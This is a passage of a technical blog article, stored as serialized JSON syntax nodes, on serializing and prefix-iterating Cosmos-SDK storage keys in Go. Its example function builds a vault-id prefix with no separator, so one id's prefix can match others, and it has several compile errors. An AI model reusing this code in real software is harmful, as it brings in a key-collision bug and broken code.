7,"props":95232,"children":95233},{"style":1335},[95234],{"type":33,"value":92787},{"type":27,"tag":207,"props":95236,"children":95237},{"style":238},[95238],{"type":33,"value":9090},{"type":27,"tag":207,"props":95240,"children":95241},{"class":209,"line":8116},[95242,95246,95250],{"type":27,"tag":207,"props":95243,"children":95244},{"style":238},[95245],{"type":33,"value":93677},{"type":27,"tag":207,"props":95247,"children":95248},{"style":8920},[95249],{"type":33,"value":91988},{"type":27,"tag":207,"props":95251,"children":95252},{"style":238},[95253],{"type":33,"value":1842},{"type":27,"tag":207,"props":95255,"children":95256},{"class":209,"line":8125},[95257,95261,95265,95269,95273,95277,95281,95285],{"type":27,"tag":207,"props":95258,"children":95259},{"style":220},[95260],{"type":33,"value":93693},{"type":27,"tag":207,"props":95262,"children":95263},{"style":238},[95264],{"type":33,"value":1041},{"type":27,"tag":207,"props":95266,"children":95267},{"style":1335},[95268],{"type":33,"value":92824},{"type":27,"tag":207,"props":95270,"children":95271},{"style":238},[95272],{"type":33,"value":1343},{"type":27,"tag":207,"props":95274,"children":95275},{"style":1335},[95276],{"type":33,"value":16416},{"type":27,"tag":207,"props":95278,"children":95279},{"style":238},[95280],{"type":33,"value":1343},{"type":27,"tag":207,"props":95282,"children":95283},{"style":220},[95284],{"type":33,"value":94063},{"type":27,"tag":207,"props":95286,"children":95287},{"style":238},[95288],{"type":33,"value":92845},{"type":27,"tag":207,"props":95290,"children":95291},{"class":209,"line":8133},[95292],{"type":27,"tag":207,"props":95293,"children":95294},{"style":238},[95295],{"type":33,"value":31184},{"type":27,"tag":207,"props":95297,"children":95298},{"class":209,"line":8142},[95299,95303,95307,95311,95315,95319,95323,95327],{"type":27,"tag":207,"props":95300,"children":95301},{"style":220},[95302],{"type":33,"value":92815},{"type":27,"tag":207,"props":95304,"children":95305},{"style":238},[95306],{"type":33,"value":1041},{"type":27,"tag":207,"props":95308,"children":95309},{"style":1335},[95310],{"type":33,"value":92869},{"type":27,"tag":207,"props":95312,"children":95313},{"style":238},[95314],{"type":33,"value":1343},{"type":27,"tag":207,"props":95316,"children":95317},{"style":220},[95318],{"type":33,"value":94313},{"type":27,"tag":207,"props":95320,"children":95321},{"style":238},[95322],{"type":33,"value":1123},{"type":27,"tag":207,"props":95324,"children":95325},{"style":220},[95326],{"type":33,"value":94063},{"type":27,"tag":207,"props":95328,"children":95329},{"style":238},[95330],{"type":33,"value":10449},{"type":27,"tag":207,"props":95332,"children":95333},{"class":209,"line":8151},[95334],{"type":27,"tag":207,"props":95335,"children":95336},{"emptyLinePlaceholder":19},[95337],{"type":33,"value":2062},{"type":27,"tag":207,"props":95339,"children":95340},{"class":209,"line":8160},[95341,95345,95349,95353,95357,95361],{"type":27,"tag":207,"props":95342,"children":95343},{"style":220},[95344],{"type":33,"value":93897},{"type":27,"tag":207,"props":95346,"children":95347},{"style":226},[95348],{"type":33,"value":83648},{"type":27,"tag":207,"props":95350,"children":95351},{"style":220},[95352],{"type":33,"value":89457},{"type":27,"tag":207,"props":95354,"children":95355},{"style":238},[95356],{"type":33,"value":1041},{"type":27,"tag":207,"props":95358,"children":95359},{"style":1335},[95360],{"type":33,"value":92446},{"type":27,"tag":207,"props":95362,"children":95363},{"style":238},[95364],{"type":33,"value":9090},{"type":27,"tag":207,"props":95366,"children":95367},{"class":209,"line":8169},[95368,95372],{"type":27,"tag":207,"props":95369,"children":95370},{"style":1325},[95371],{"type":33,"value":94922},{"type":27,"tag":207,"props":95373,"children":95374},{"style":238},[95375],{"type":33,"value":1842},{"type":27,"tag":207,"props":95377,"children":95378},{"class":209,"line":8177},[95379,95384],{"type":27,"tag":207,"props":95380,"children":95381},{"style":220},[95382],{"type":33,"value":95383}," AddressMapPrefix",{"type":27,"tag":207,"props":95385,"children":95386},{"style":238},[95387],{"type":33,"value":1842},{"type":27,"tag":207,"props":95389,"children":95390},{"class":209,"line":8185},[95391,95395],{"type":27,"tag":207,"props":95392,"children":95393},{"style":220},[95394],{"type":33,"value":93937},{"type":27,"tag":207,"props":95396,"children":95397},{"style":238},[95398],{"type":33,"value":1842},{"type":27,"tag":207,"props":95400,"children":95401},{"class":209,"line":8194},[95402,95406],{"type":27,"tag":207,"props":95403,"children":95404},{"style":220},[95405],{"type":33,"value":93949},{"type":27,"tag":207,"props":95407,"children":95408},{"style":238},[95409],{"type":33,"value":1842},{"type":27,"tag":207,"props":95411,"children":95412},{"class":209,"line":9933},[95413,95417],{"type":27,"tag":207,"props":95414,"children":95415},{"style":220},[95416],{"type":33,"value":93961},{"type":27,"tag":207,"props":95418,"children":95419},{"style":238},[95420],{"type":33,"value":1842},{"type":27,"tag":207,"props":95422,"children":95423},{"class":209,"line":9941},[95424,95428],{"type":27,"tag":207,"props":95425,"children":95426},{"style":220},[95427],{"type":33,"value":93949},{"type":27,"tag":207,"props":95429,"children":95430},{"style":238},[95431],{"type":33,"value":1842},{"type":27,"tag":207,"props":95433,"children":95434},{"class":209,"line":9950},[95435,95439],{"type":27,"tag":207,"props":95436,"children":95437},{"style":220},[95438],{"type":33,"value":94422},{"type":27,"tag":207,"props":95440,"children":95441},{"style":238},[95442],{"type":33,"value":1842},{"type":27,"tag":207,"props":95444,"children":95445},{"class":209,"line":9959},[95446],{"type":27,"tag":207,"props":95447,"children":95448},{"style":238},[95449],{"type":33,"value":31184},{"type":27,"tag":207,"props":95451,"children":95452},{"class":209,"line":9968},[95453],{"type":27,"tag":207,"props":95454,"children":95455},{"style":238},[95456],{"type":33,"value":451},{"type":27,"tag":36,"props":95458,"children":95459},{},[95460],{"type":33,"value":95461},"We now have a proper example of how to serialize storage keys.",{"type":27,"tag":36,"props":95463,"children":95464},{},[95465,95467,95472],{"type":33,"value":95466},"Nonetheless, there is more to storage than just this. As previously mentioned, storages are expected to support their original functionalities. In the case of ",{"type":27,"tag":84,"props":95468,"children":95470},{"className":95469},[],[95471],{"type":33,"value":74335},{"type":33,"value":95473},", data should still be retrievable through original keys.",{"type":27,"tag":36,"props":95475,"children":95476},{},[95477,95479,95485,95487,95492],{"type":33,"value":95478},"Let's look at a case where we want to retrieve all ",{"type":27,"tag":84,"props":95480,"children":95482},{"className":95481},[],[95483],{"type":33,"value":95484},"map[Username]map[PositionName]Position",{"type":33,"value":95486}," associated with a ",{"type":27,"tag":84,"props":95488,"children":95490},{"className":95489},[],[95491],{"type":33,"value":92358},{"type":33,"value":95493}," from the storage. How can we safely accomplish this?",{"type":27,"tag":36,"props":95495,"children":95496},{},[95497,95499,95504,95506,95512],{"type":33,"value":95498},"Fortunately, the Cosmos-SDK provides APIs to fetch all entries associated with a ",{"type":27,"tag":84,"props":95500,"children":95502},{"className":95501},[],[95503],{"type":33,"value":92429},{"type":33,"value":95505}," prefix. Below is an example of an attempt to fetch data with ",{"type":27,"tag":84,"props":95507,"children":95509},{"className":95508},[],[95510],{"type":33,"value":95511},"vaultId",{"type":33,"value":736},{"type":27,"tag":101,"props":95514,"children":95516},{"code":95515,"language":83397,"meta":7,"className":83398,"style":7},"func FetchPositionMapWithVaultId(\n vaultId uint64,\n) ([]map[Username]map[PositionName]Position) {\n values := map[Username]map[PositionName]Position{}\n i := sdk.KVStorePrefixIterator(\n kvStore,\n fmt.Sprintf(\"%s%d\", PositionMapPrefix, vaultId)\n )\n for ; i.Valid(); i.Next() {\n k := strings.split(i.Key(), Seperator)\n\n username := make([]byte, hex.DecodedLen(k[0]))\n _, err := hex.Decode(username, k[0])\n if err != nil {\n return nil, err\n }\n\n positionName := make([]byte, hex.DecodedLen(k[1]))\n _, err := hex.Decode(positionName, k[1])\n if err != nil {\n return nil, err\n }\n\n if entry, ok := values[username]; !ok {\n values[username] = make(map[PositionName])\n }\n\n values[username][positionName] = Position {\n data: iterator.Value(),\n }\n }\n return values\n}\n",[95517],{"type":27,"tag":84,"props":95518,"children":95519},{"__ignoreMap":7},[95520,95536,95551,95600,95652,95681,95693,95739,95746,95792,95847,95854,95918,95979,96002,96021,96028,96035,96095,96154,96177,96196,96203,96210,96263,96311,96318,96325,96365,96394,96401,96408,96420],{"type":27,"tag":207,"props":95521,"children":95522},{"class":209,"line":210},[95523,95527,95532],{"type":27,"tag":207,"props":95524,"children":95525},{"style":214},[95526],{"type":33,"value":2085},{"type":27,"tag":207,"props":95528,"children":95529},{"style":1335},[95530],{"type":33,"value":95531}," FetchPositionMapWithVaultId",{"type":27,"tag":207,"props":95533,"children":95534},{"style":238},[95535],{"type":33,"value":9090},{"type":27,"tag":207,"props":95537,"children":95538},{"class":209,"line":244},[95539,95543,95547],{"type":27,"tag":207,"props":95540,"children":95541},{"style":220},[95542],{"type":33,"value":92470},{"type":27,"tag":207,"props":95544,"children":95545},{"style":8920},[95546],{"type":33,"value":83653},{"type":27,"tag":207,"props":95548,"children":95549},{"style":238},[95550],{"type":33,"value":1842},{"type":27,"tag":207,"props":95552,"children":95553},{"class":209,"line":270},[95554,95559,95563,95567,95571,95575,95579,95583,95587,95591,95596],{"type":27,"tag":207,"props":95555,"children":95556},{"style":238},[95557],{"type":33,"value":95558},") ([]",{"type":27,"tag":207,"props":95560,"children":95561},{"style":214},[95562],{"type":33,"value":74335},{"type":27,"tag":207,"props":95564,"children":95565},{"style":238},[95566],{"type":33,"value":11019},{"type":27,"tag":207,"props":95568,"children":95569},{"style":8920},[95570],{"type":33,"value":92375},{"type":27,"tag":207,"props":95572,"children":95573},{"style":238},[95574],{"type":33,"value":22686},{"type":27,"tag":207,"props":95576,"children":95577},{"style":214},[95578],{"type":33,"value":74335},{"type":27,"tag":207,"props":95580,"children":95581},{"style":238},[95582],{"type":33,"value":11019},{"type":27,"tag":207,"props":95584,"children":95585},{"style":8920},[95586],{"type":33,"value":92392},{"type":27,"tag":207,"props":95588,"children":95589},{"style":238},[95590],{"type":33,"value":22686},{"type":27,"tag":207,"props":95592,"children":95593},{"style":8920},[95594],{"type":33,"value":95595},"Position",{"type":27,"tag":207,"props":95597,"children":95598},{"style":238},[95599],{"type":33,"value":1424},{"type":27,"tag":207,"props":95601,"children":95602},{"class":209,"line":296},[95603,95608,95612,95616,95620,95624,95628,95632,95636,95640,95644,95648],{"type":27,"tag":207,"props":95604,"children":95605},{"style":220},[95606],{"type":33,"value":95607}," values",{"type":27,"tag":207,"props":95609,"children":95610},{"style":226},[95611],{"type":33,"value":83648},{"type":27,"tag":207,"props":95613,"children":95614},{"style":214},[95615],{"type":33,"value":56907},{"type":27,"tag":207,"props":95617,"children":95618},{"style":238},[95619],{"type":33,"value":11019},{"type":27,"tag":207,"props":95621,"children":95622},{"style":8920},[95623],{"type":33,"value":92375},{"type":27,"tag":207,"props":95625,"children":95626},{"style":238},[95627],{"type":33,"value":22686},{"type":27,"tag":207,"props":95629,"children":95630},{"style":214},[95631],{"type":33,"value":74335},{"type":27,"tag":207,"props":95633,"children":95634},{"style":238},[95635],{"type":33,"value":11019},{"type":27,"tag":207,"props":95637,"children":95638},{"style":8920},[95639],{"type":33,"value":92392},{"type":27,"tag":207,"props":95641,"children":95642},{"style":238},[95643],{"type":33,"value":22686},{"type":27,"tag":207,"props":95645,"children":95646},{"style":8920},[95647],{"type":33,"value":95595},{"type":27,"tag":207,"props":95649,"children":95650},{"style":238},[95651],{"type":33,"value":85328},{"type":27,"tag":207,"props":95653,"children":95654},{"class":209,"line":445},[95655,95660,95664,95668,95672,95677],{"type":27,"tag":207,"props":95656,"children":95657},{"style":220},[95658],{"type":33,"value":95659}," i",{"type":27,"tag":207,"props":95661,"children":95662},{"style":226},[95663],{"type":33,"value":83648},{"type":27,"tag":207,"props":95665,"children":95666},{"style":220},[95667],{"type":33,"value":85872},{"type":27,"tag":207,"props":95669,"children":95670},{"style":238},[95671],{"type":33,"value":1041},{"type":27,"tag":207,"props":95673,"children":95674},{"style":1335},[95675],{"type":33,"value":95676},"KVStorePrefixIterator",{"type":27,"tag":207,"props":95678,"children":95679},{"style":238},[95680],{"type":33,"value":9090},{"type":27,"tag":207,"props":95682,"children":95683},{"class":209,"line":867},[95684,95689],{"type":27,"tag":207,"props":95685,"children":95686},{"style":220},[95687],{"type":33,"value":95688}," kvStore",{"type":27,"tag":207,"props":95690,"children":95691},{"style":238},[95692],{"type":33,"value":1842},{"type":27,"tag":207,"props":95694,"children":95695},{"class":209,"line":892},[95696,95701,95705,95709,95713,95718,95722,95727,95731,95735],{"type":27,"tag":207,"props":95697,"children":95698},{"style":220},[95699],{"type":33,"value":95700}," fmt",{"type":27,"tag":207,"props":95702,"children":95703},{"style":238},[95704],{"type":33,"value":1041},{"type":27,"tag":207,"props":95706,"children":95707},{"style":1335},[95708],{"type":33,"value":92446},{"type":27,"tag":207,"props":95710,"children":95711},{"style":238},[95712],{"type":33,"value":1343},{"type":27,"tag":207,"props":95714,"children":95715},{"style":1325},[95716],{"type":33,"value":95717},"\"%s%d\"",{"type":27,"tag":207,"props":95719,"children":95720},{"style":238},[95721],{"type":33,"value":1123},{"type":27,"tag":207,"props":95723,"children":95724},{"style":220},[95725],{"type":33,"value":95726},"PositionMapPrefix",{"type":27,"tag":207,"props":95728,"children":95729},{"style":238},[95730],{"type":33,"value":1123},{"type":27,"tag":207,"props":95732,"children":95733},{"style":220},[95734],{"type":33,"value":95511},{"type":27,"tag":207,"props":95736,"children":95737},{"style":238},[95738],{"type":33,"value":10449},{"type":27,"tag":207,"props":95740,"children":95741},{"class":209,"line":1475},[95742],{"type":27,"tag":207,"props":95743,"children":95744},{"style":238},[95745],{"type":33,"value":31184},{"type":27,"tag":207,"props":95747,"children":95748},{"class":209,"line":2065},[95749,95753,95758,95762,95766,95771,95775,95779,95783,95788],{"type":27,"tag":207,"props":95750,"children":95751},{"style":376},[95752],{"type":33,"value":10321},{"type":27,"tag":207,"props":95754,"children":95755},{"style":238},[95756],{"type":33,"value":95757}," ; ",{"type":27,"tag":207,"props":95759,"children":95760},{"style":220},[95761],{"type":33,"value":4690},{"type":27,"tag":207,"props":95763,"children":95764},{"style":238},[95765],{"type":33,"value":1041},{"type":27,"tag":207,"props":95767,"children":95768},{"style":1335},[95769],{"type":33,"value":95770},"Valid",{"type":27,"tag":207,"props":95772,"children":95773},{"style":238},[95774],{"type":33,"value":35714},{"type":27,"tag":207,"props":95776,"children":95777},{"style":220},[95778],{"type":33,"value":4690},{"type":27,"tag":207,"props":95780,"children":95781},{"style":238},[95782],{"type":33,"value":1041},{"type":27,"tag":207,"props":95784,"children":95785},{"style":1335},[95786],{"type":33,"value":95787},"Next",{"type":27,"tag":207,"props":95789,"children":95790},{"style":238},[95791],{"type":33,"value":23011},{"type":27,"tag":207,"props":95793,"children":95794},{"class":209,"line":2092},[95795,95800,95804,95809,95813,95817,95821,95825,95829,95834,95838,95843],{"type":27,"tag":207,"props":95796,"children":95797},{"style":220},[95798],{"type":33,"value":95799}," k",{"type":27,"tag":207,"props":95801,"children":95802},{"style":226},[95803],{"type":33,"value":83648},{"type":27,"tag":207,"props":95805,"children":95806},{"style":220},[95807],{"type":33,"value":95808}," strings",{"type":27,"tag":207,"props":95810,"children":95811},{"style":238},[95812],{"type":33,"value":1041},{"type":27,"tag":207,"props":95814,"children":95815},{"style":1335},[95816],{"type":33,"value":77276},{"type":27,"tag":207,"props":95818,"children":95819},{"style":238},[95820],{"type":33,"value":1343},{"type":27,"tag":207,"props":95822,"children":95823},{"style":220},[95824],{"type":33,"value":4690},{"type":27,"tag":207,"props":95826,"children":95827},{"style":238},[95828],{"type":33,"value":1041},{"type":27,"tag":207,"props":95830,"children":95831},{"style":1335},[95832],{"type":33,"value":95833},"Key",{"type":27,"tag":207,"props":95835,"children":95836},{"style":238},[95837],{"type":33,"value":25646},{"type":27,"tag":207,"props":95839,"children":95840},{"style":220},[95841],{"type":33,"value":95842},"Seperator",{"type":27,"tag":207,"props":95844,"children":95845},{"style":238},[95846],{"type":33,"value":10449},{"type":27,"tag":207,"props":95848,"children":95849},{"class":209,"line":2130},[95850],{"type":27,"tag":207,"props":95851,"children":95852},{"emptyLinePlaceholder":19},[95853],{"type":33,"value":2062},{"type":27,"tag":207,"props":95855,"children":95856},{"class":209,"line":2168},[95857,95862,95866,95870,95875,95879,95883,95887,95891,95896,95900,95905,95909,95913],{"type":27,"tag":207,"props":95858,"children":95859},{"style":220},[95860],{"type":33,"value":95861}," username",{"type":27,"tag":207,"props":95863,"children":95864},{"style":226},[95865],{"type":33,"value":83648},{"type":27,"tag":207,"props":95867,"children":95868},{"style":1335},[95869],{"type":33,"value":92787},{"type":27,"tag":207,"props":95871,"children":95872},{"style":238},[95873],{"type":33,"value":95874},"([]",{"type":27,"tag":207,"props":95876,"children":95877},{"style":8920},[95878],{"type":33,"value":91988},{"type":27,"tag":207,"props":95880,"children":95881},{"style":238},[95882],{"type":33,"value":1123},{"type":27,"tag":207,"props":95884,"children":95885},{"style":220},[95886],{"type":33,"value":92860},{"type":27,"tag":207,"props":95888,"children":95889},{"style":238},[95890],{"type":33,"value":1041},{"type":27,"tag":207,"props":95892,"children":95893},{"style":1335},[95894],{"type":33,"value":95895},"DecodedLen",{"type":27,"tag":207,"props":95897,"children":95898},{"style":238},[95899],{"type":33,"value":1343},{"type":27,"tag":207,"props":95901,"children":95902},{"style":220},[95903],{"type":33,"value":95904},"k",{"type":27,"tag":207,"props":95906,"children":95907},{"style":238},[95908],{"type":33,"value":11019},{"type":27,"tag":207,"props":95910,"children":95911},{"style":232},[95912],{"type":33,"value":1660},{"type":27,"tag":207,"props":95914,"children":95915},{"style":238},[95916],{"type":33,"value":95917},"]))\n",{"type":27,"tag":207,"props":95919,"children":95920},{"class":209,"line":4095},[95921,95925,95929,95933,95937,95942,95946,95951,95955,95959,95963,95967,95971,95975],{"type":27,"tag":207,"props":95922,"children":95923},{"style":220},[95924],{"type":33,"value":35013},{"type":27,"tag":207,"props":95926,"children":95927},{"style":238},[95928],{"type":33,"value":1123},{"type":27,"tag":207,"props":95930,"children":95931},{"style":220},[95932],{"type":33,"value":55659},{"type":27,"tag":207,"props":95934,"children":95935},{"style":226},[95936],{"type":33,"value":83648},{"type":27,"tag":207,"props":95938,"children":95939},{"style":220},[95940],{"type":33,"value":95941}," hex",{"type":27,"tag":207,"props":95943,"children":95944},{"style":238},[95945],{"type":33,"value":1041},{"type":27,"tag":207,"props":95947,"children":95948},{"style":1335},[95949],{"type":33,"value":95950},"Decode",{"type":27,"tag":207,"props":95952,"children":95953},{"style":238},[95954],{"type":33,"value":1343},{"type":27,"tag":207,"props":95956,"children":95957},{"style":220},[95958],{"type":33,"value":92694},{"type":27,"tag":207,"props":95960,"children":95961},{"style":238},[95962],{"type":33,"value":1123},{"type":27,"tag":207,"props":95964,"children":95965},{"style":220},[95966],{"type":33,"value":95904},{"type":27,"tag":207,"props":95968,"children":95969},{"style":238},[95970],{"type":33,"value":11019},{"type":27,"tag":207,"props":95972,"children":95973},{"style":232},[95974],{"type":33,"value":1660},{"type":27,"tag":207,"props":95976,"children":95977},{"style":238},[95978],{"type":33,"value":62676},{"type":27,"tag":207,"props":95980,"children":95981},{"class":209,"line":4103},[95982,95986,95990,95994,95998],{"type":27,"tag":207,"props":95983,"children":95984},{"style":376},[95985],{"type":33,"value":10562},{"type":27,"tag":207,"props":95987,"children":95988},{"style":220},[95989],{"type":33,"value":55760},{"type":27,"tag":207,"props":95991,"children":95992},{"style":226},[95993],{"type":33,"value":71619},{"type":27,"tag":207,"props":95995,"children":95996},{"style":214},[95997],{"type":33,"value":89141},{"type":27,"tag":207,"props":95999,"children":96000},{"style":238},[96001],{"type":33,"value":384},{"type":27,"tag":207,"props":96003,"children":96004},{"class":209,"line":4154},[96005,96009,96013,96017],{"type":27,"tag":207,"props":96006,"children":96007},{"style":376},[96008],{"type":33,"value":86307},{"type":27,"tag":207,"props":96010,"children":96011},{"style":214},[96012],{"type":33,"value":89141},{"type":27,"tag":207,"props":96014,"children":96015},{"style":238},[96016],{"type":33,"value":1123},{"type":27,"tag":207,"props":96018,"children":96019},{"style":220},[96020],{"type":33,"value":90862},{"type":27,"tag":207,"props":96022,"children":96023},{"class":209,"line":4203},[96024],{"type":27,"tag":207,"props":96025,"children":96026},{"style":238},[96027],{"type":33,"value":10637},{"type":27,"tag":207,"props":96029,"children":96030},{"class":209,"line":4249},[96031],{"type":27,"tag":207,"props":96032,"children":96033},{"emptyLinePlaceholder":19},[96034],{"type":33,"value":2062},{"type":27,"tag":207,"props":96036,"children":96037},{"class":209,"line":4290},[96038,96043,96047,96051,96055,96059,96063,96067,96071,96075,96079,96083,96087,96091],{"type":27,"tag":207,"props":96039,"children":96040},{"style":220},[96041],{"type":33,"value":96042}," positionName",{"type":27,"tag":207,"props":96044,"children":96045},{"style":226},[96046],{"type":33,"value":83648},{"type":27,"tag":207,"props":96048,"children":96049},{"style":1335},[96050],{"type":33,"value":92787},{"type":27,"tag":207,"props":96052,"children":96053},{"style":238},[96054],{"type":33,"value":95874},{"type":27,"tag":207,"props":96056,"children":96057},{"style":8920},[96058],{"type":33,"value":91988},{"type":27,"tag":207,"props":96060,"children":96061},{"style":238},[96062],{"type":33,"value":1123},{"type":27,"tag":207,"props":96064,"children":96065},{"style":220},[96066],{"type":33,"value":92860},{"type":27,"tag":207,"props":96068,"children":96069},{"style":238},[96070],{"type":33,"value":1041},{"type":27,"tag":207,"props":96072,"children":96073},{"style":1335},[96074],{"type":33,"value":95895},{"type":27,"tag":207,"props":96076,"children":96077},{"style":238},[96078],{"type":33,"value":1343},{"type":27,"tag":207,"props":96080,"children":96081},{"style":220},[96082],{"type":33,"value":95904},{"type":27,"tag":207,"props":96084,"children":96085},{"style":238},[96086],{"type":33,"value":11019},{"type":27,"tag":207,"props":96088,"children":96089},{"style":232},[96090],{"type":33,"value":1651},{"type":27,"tag":207,"props":96092,"children":96093},{"style":238},[96094],{"type":33,"value":95917},{"type":27,"tag":207,"props":96096,"children":96097},{"class":209,"line":4304},[96098,96102,96106,96110,96114,96118,96122,96126,96130,96134,96138,96142,96146,96150],{"type":27,"tag":207,"props":96099,"children":96100},{"style":220},[96101],{"type":33,"value":35013},{"type":27,"tag":207,"props":96103,"children":96104},{"style":238},[96105],{"type":33,"value":1123},{"type":27,"tag":207,"props":96107,"children":96108},{"style":220},[96109],{"type":33,"value":55659},{"type":27,"tag":207,"props":96111,"children":96112},{"style":226},[96113],{"type":33,"value":83648},{"type":27,"tag":207,"props":96115,"children":96116},{"style":220},[96117],{"type":33,"value":95941},{"type":27,"tag":207,"props":96119,"children":96120},{"style":238},[96121],{"type":33,"value":1041},{"type":27,"tag":207,"props":96123,"children":96124},{"style":1335},[96125],{"type":33,"value":95950},{"type":27,"tag":207,"props":96127,"children":96128},{"style":238},[96129],{"type":33,"value":1343},{"type":27,"tag":207,"props":96131,"children":96132},{"style":220},[96133],{"type":33,"value":92963},{"type":27,"tag":207,"props":96135,"children":96136},{"style":238},[96137],{"type":33,"value":1123},{"type":27,"tag":207,"props":96139,"children":96140},{"style":220},[96141],{"type":33,"value":95904},{"type":27,"tag":207,"props":96143,"children":96144},{"style":238},[96145],{"type":33,"value":11019},{"type":27,"tag":207,"props":96147,"children":96148},{"style":232},[96149],{"type":33,"value":1651},{"type":27,"tag":207,"props":96151,"children":96152},{"style":238},[96153],{"type":33,"value":62676},{"type":27,"tag":207,"props":96155,"children":96156},{"class":209,"line":5466},[96157,96161,96165,96169,96173],{"type":27,"tag":207,"props":96158,"children":96159},{"style":376},[96160],{"type":33,"value":10562},{"type":27,"tag":207,"props":96162,"children":96163},{"style":220},[96164],{"type":33,"value":55760},{"type":27,"tag":207,"props":96166,"children":96167},{"style":226},[96168],{"type":33,"value":71619},{"type":27,"tag":207,"props":96170,"children":96171},{"style":214},[96172],{"type":33,"value":89141},{"type":27,"tag":207,"props":96174,"children":96175},{"style":238},[96176],{"type":33,"value":384},{"type":27,"tag":207,"props":96178,"children":96179},{"class":209,"line":5530},[96180,96184,96188,96192],{"type":27,"tag":207,"props":96181,"children":96182},{"style":376},[96183],{"type":33,"value":86307},{"type":27,"tag":207,"props":96185,"children":96186},{"style":214},[96187],{"type":33,"value":89141},{"type":27,"tag":207,"props":96189,"children":96190},{"style":238},[96191],{"type":33,"value":1123},{"type":27,"tag":207,"props":96193,"children":96194},{"style":220},[96195],{"type":33,"value":90862},{"type":27,"tag":207,"props":96197,"children":96198},{"class":209,"line":7900},[96199],{"type":27,"tag":207,"props":96200,"children":96201},{"style":238},[96202],{"type":33,"value":10637},{"type":27,"tag":207,"props":96204,"children":96205},{"class":209,"line":7909},[96206],{"type":27,"tag":207,"props":96207,"children":96208},{"emptyLinePlaceholder":19},[96209],{"type":33,"value":2062},{"type":27,"tag":207,"props":96211,"children":96212},{"class":209,"line":7917},[96213,96217,96221,96225,96229,96233,96238,96242,96246,96251,96255,96259],{"type":27,"tag":207,"props":96214,"children":96215},{"style":376},[96216],{"type":33,"value":10562},{"type":27,"tag":207,"props":96218,"children":96219},{"style":220},[96220],{"type":33,"value":69874},{"type":27,"tag":207,"props":96222,"children":96223},{"style":238},[96224],{"type":33,"value":1123},{"type":27,"tag":207,"props":96226,"children":96227},{"style":220},[96228],{"type":33,"value":85998},{"type":27,"tag":207,"props":96230,"children":96231},{"style":226},[96232],{"type":33,"value":83648},{"type":27,"tag":207,"props":96234,"children":96235},{"style":220},[96236],{"type":33,"value":96237}," values",{"type":27,"tag":207,"props":96239,"children":96240},{"style":238},[96241],{"type":33,"value":11019},{"type":27,"tag":207,"props":96243,"children":96244},{"style":220},[96245],{"type":33,"value":92694},{"type":27,"tag":207,"props":96247,"children":96248},{"style":238},[96249],{"type":33,"value":96250},"]; ",{"type":27,"tag":207,"props":96252,"children":96253},{"style":226},[96254],{"type":33,"value":27893},{"type":27,"tag":207,"props":96256,"children":96257},{"style":220},[96258],{"type":33,"value":85998},{"type":27,"tag":207,"props":96260,"children":96261},{"style":238},[96262],{"type":33,"value":384},{"type":27,"tag":207,"props":96264,"children":96265},{"class":209,"line":7926},[96266,96271,96275,96279,96283,96287,96291,96295,96299,96303,96307],{"type":27,"tag":207,"props":96267,"children":96268},{"style":220},[96269],{"type":33,"value":96270}," values",{"type":27,"tag":207,"props":96272,"children":96273},{"style":238},[96274],{"type":33,"value":11019},{"type":27,"tag":207,"props":96276,"children":96277},{"style":220},[96278],{"type":33,"value":92694},{"type":27,"tag":207,"props":96280,"children":96281},{"style":238},[96282],{"type":33,"value":15942},{"type":27,"tag":207,"props":96284,"children":96285},{"style":226},[96286],{"type":33,"value":10380},{"type":27,"tag":207,"props":96288,"children":96289},{"style":1335},[96290],{"type":33,"value":92787},{"type":27,"tag":207,"props":96292,"children":96293},{"style":238},[96294],{"type":33,"value":1343},{"type":27,"tag":207,"props":96296,"children":96297},{"style":214},[96298],{"type":33,"value":74335},{"type":27,"tag":207,"props":96300,"children":96301},{"style":238},[96302],{"type":33,"value":11019},{"type":27,"tag":207,"props":96304,"children":96305},{"style":8920},[96306],{"type":33,"value":92392},{"type":27,"tag":207,"props":96308,"children":96309},{"style":238},[96310],{"type":33,"value":62676},{"type":27,"tag":207,"props":96312,"children":96313},{"class":209,"line":7934},[96314],{"type":27,"tag":207,"props":96315,"children":96316},{"style":238},[96317],{"type":33,"value":10637},{"type":27,"tag":207,"props":96319,"children":96320},{"class":209,"line":7943},[96321],{"type":27,"tag":207,"props":96322,"children":96323},{"emptyLinePlaceholder":19},[96324],{"type":33,"value":2062},{"type":27,"tag":207,"props":96326,"children":96327},{"class":209,"line":7952},[96328,96333,96337,96341,96345,96349,96353,96357,96361],{"type":27,"tag":207,"props":96329,"children":96330},{"style":220},[96331],{"type":33,"value":96332}," values",{"type":27,"tag":207,"props":96334,"children":96335},{"style":238},[96336],{"type":33,"value":11019},{"type":27,"tag":207,"props":96338,"children":96339},{"style":220},[96340],{"type":33,"value":92694},{"type":27,"tag":207,"props":96342,"children":96343},{"style":238},[96344],{"type":33,"value":56196},{"type":27,"tag":207,"props":96346,"children":96347},{"style":220},[96348],{"type":33,"value":92963},{"type":27,"tag":207,"props":96350,"children":96351},{"style":238},[96352],{"type":33,"value":15942},{"type":27,"tag":207,"props":96354,"children":96355},{"style":226},[96356],{"type":33,"value":10380},{"type":27,"tag":207,"props":96358,"children":96359},{"style":220},[96360],{"type":33,"value":14707},{"type":27,"tag":207,"props":96362,"children":96363},{"style":238},[96364],{"type":33,"value":384},{"type":27,"tag":207,"props":96366,"children":96367},{"class":209,"line":7961},[96368,96372,96376,96381,96385,96390],{"type":27,"tag":207,"props":96369,"children":96370},{"style":220},[96371],{"type":33,"value":34216},{"type":27,"tag":207,"props":96373,"children":96374},{"style":238},[96375],{"type":33,"value":22606},{"type":27,"tag":207,"props":96377,"children":96378},{"style":220},[96379],{"type":33,"value":96380},"iterator",{"type":27,"tag":207,"props":96382,"children":96383},{"style":238},[96384],{"type":33,"value":1041},{"type":27,"tag":207,"props":96386,"children":96387},{"style":1335},[96388],{"type":33,"value":96389},"Value",{"type":27,"tag":207,"props":96391,"children":96392},{"style":238},[96393],{"type":33,"value":10778},{"type":27,"tag":207,"props":96395,"children":96396},{"class":209,"line":7969},[96397],{"type":27,"tag":207,"props":96398,"children":96399},{"style":238},[96400],{"type":33,"value":10637},{"type":27,"tag":207,"props":96402,"children":96403},{"class":209,"line":7978},[96404],{"type":27,"tag":207,"props":96405,"children":96406},{"style":238},[96407],{"type":33,"value":10645},{"type":27,"tag":207,"props":96409,"children":96410},{"class":209,"line":7987},[96411,96415],{"type":27,"tag":207,"props":96412,"children":96413},{"style":376},[96414],{"type":33,"value":8986},{"type":27,"tag":207,"props":96416,"children":96417},{"style":220},[96418],{"type":33,"value":96419}," 